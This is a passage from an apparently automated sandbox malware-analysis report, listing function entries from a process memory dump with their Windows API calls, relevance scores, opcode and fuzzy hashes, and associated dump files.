                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 080212c8f39ddedcadee8af51b8c0db4c41c1ef3d3e7bad0f263b56a803750c5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8F082712006069FD320EF76D955F96FBE9BF45790F004029F85AC7251DB74A800DF90
                                                                                                                                                                                                                                                                                                        Function 00FBCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00FBCEEE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7ad3ed98675c937c732fd3b8e84a53db240799e437c826933ba245ae2fcc16cb
                                                                                                                                                                                                                                                                                                        • Instruction ID: d79525b93a4188fab4ad8838a2c8fd9027dbf70929754202ad0522e54044c3f7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ad3ed98675c937c732fd3b8e84a53db240799e437c826933ba245ae2fcc16cb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2632BB75A042059FDB21CF59C884ABEBBB5FF48310F188099E99AAB291C735ED41DF90
                                                                                                                                                                                                                                                                                                        Function 01037AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e13a5e8abf8a2571b8389ff8bd65b87f4750f1fc475b7bf41c888904736c5157
                                                                                                                                                                                                                                                                                                        • Instruction ID: 75aff1a76684f467f048f528c4a0bcbc99194b5b01f7acdd9686a9b0aec5a4ea
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13a5e8abf8a2571b8389ff8bd65b87f4750f1fc475b7bf41c888904736c5157
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BD15D75A0020AEFCB14EF99C8819EDBBB9FF88310F144199E955AB391DB35AD41CF90
                                                                                                                                                                                                                                                                                                        Function 00FDF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7967def66470090c7beebd19665b3284c293efb65c4cfb37c1f0c2938b9f9cda
                                                                                                                                                                                                                                                                                                        • Instruction ID: d12baa581b4ac1ce05fb0e3293283952aa310d076a1599718dfab821639e692a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7967def66470090c7beebd19665b3284c293efb65c4cfb37c1f0c2938b9f9cda
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B251C435E00148AFDB10DF68CC40FA97BA3AF85364F1D816AE84A9B392D731ED46DB50
                                                                                                                                                                                                                                                                                                        Function 0101FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0101FCCE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8c24bc705273089e2c978586abb9d5b5e43a769addc65e0546067bf86b0ffffd
                                                                                                                                                                                                                                                                                                        • Instruction ID: b8df9017ad561083667fefb7ba1885481e32e1f87c16ac86a538b4f3f4de654b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c24bc705273089e2c978586abb9d5b5e43a769addc65e0546067bf86b0ffffd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7541E6B650020AAFDB11EF68CC809EEB7F9FF44310B14456EE592D7255EB78DA09CB50
                                                                                                                                                                                                                                                                                                        Function 00FB6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB664A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB665C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB663E: FreeLibrary.KERNEL32(00000000,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB666E
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB66AB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6610
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB6622
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB6607: FreeLibrary.KERNEL32(00000000,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6635
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a5721c15946386d1d89c26423751d4d33dd9b6ef325ab1936837ca52d3a4f531
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3b2ce9e65206d4515ec5b70cb1b537a6053361a2e38f1ad05c0d47cfefc3f744
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5721c15946386d1d89c26423751d4d33dd9b6ef325ab1936837ca52d3a4f531
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34110472600205ABCB14BB62CD42BED77A29F50714F10442EF582EA1C1DE7DDA04BF50
                                                                                                                                                                                                                                                                                                        Function 00FE8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92fcdb1ee5ac8366f7593cb978050a5692d7f755d1ec508165ce87d50e95c8c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0e0b61236674a02a5f366d21df53fad7b7df7c81b3daf38ff17b8e816a3650a7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92fcdb1ee5ac8366f7593cb978050a5692d7f755d1ec508165ce87d50e95c8c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06115A7290420AAFCF05DF99E94099E7BF4EF48350F1040A9F808AB311DA31EA12DB64
                                                                                                                                                                                                                                                                                                        Function 00FE5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00FE319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00FE5031
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE53DF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 833e9b91b7347006b70b2f23f64438b287a5c88c51203dc02a94246b8073389c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F30126726003886FE3318E6ADC85A5AFBEDEB85370F25052DE58483280EA70A8059764
                                                                                                                                                                                                                                                                                                        Function 00FDE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7e192984cd9cb07b6203ca38c454f3f75f33cc9b98e4ab8c7a18697f097e55f7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0F0283290262056D6313A2B9C11B5E339A8F42378F180727F5259B3D2EF78E802B6D3
                                                                                                                                                                                                                                                                                                        Function 00FBB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 20f14e9dffafe50d2cfb73530aeaffd7a5f3a58a80efa6d77c964ff5ca0c65c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb2b703d0bea2568805d9b0664af71014f255f26f2b423121c1e29c1d66a2b2e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F028B36007007EC7109F29CC06BA6BB99EB44360F14822BFA19CB2D1DB75E410DBA0
                                                                                                                                                                                                                                                                                                        Function 0102F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0102F987
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 523b9127e340cd2770f1fc5a0f5b61dedf428476ecaf2b9219f047326fd02d86
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3dda06c60c9dbaf3316aed67b928a7af89d88b8392565a1f67b3a2c0e4483e90
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 523b9127e340cd2770f1fc5a0f5b61dedf428476ecaf2b9219f047326fd02d86
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF0DC72A00204BFCB00EBA5DC4AE9E77B9EF89320F000055F5049B361DE34EA40DB60
                                                                                                                                                                                                                                                                                                        Function 00FE4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00FE319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00FE5031
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e54f008dcf21acd09008e1fe2ffc356363310c3e61c12ba6275a9c066c98e7c7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c8a791679faacc446f94de832659ab8cdece4fe1d24b28b96f1101fb56cfb74
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e54f008dcf21acd09008e1fe2ffc356363310c3e61c12ba6275a9c066c98e7c7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1F0E937A14E6267DF315A67DC01F5A3749AF80FF4F188012BE04D7194DA34D805B6E0
                                                                                                                                                                                                                                                                                                        Function 00FE3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cc00b681b7012f07a2aa13834d88c3723eedd7f6229527d1264838639b0fb5d1
                                                                                                                                                                                                                                                                                                        • Instruction ID: a041f02461915fc65c919757d7736206a854831d64f56285b34607b2795d6223
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc00b681b7012f07a2aa13834d88c3723eedd7f6229527d1264838639b0fb5d1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2DE0E532A00AA066DA302A739C0DF5A3649AFC17B0F580121EC47D7590CB24CD00B2A1
                                                                                                                                                                                                                                                                                                        Function 00FB66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
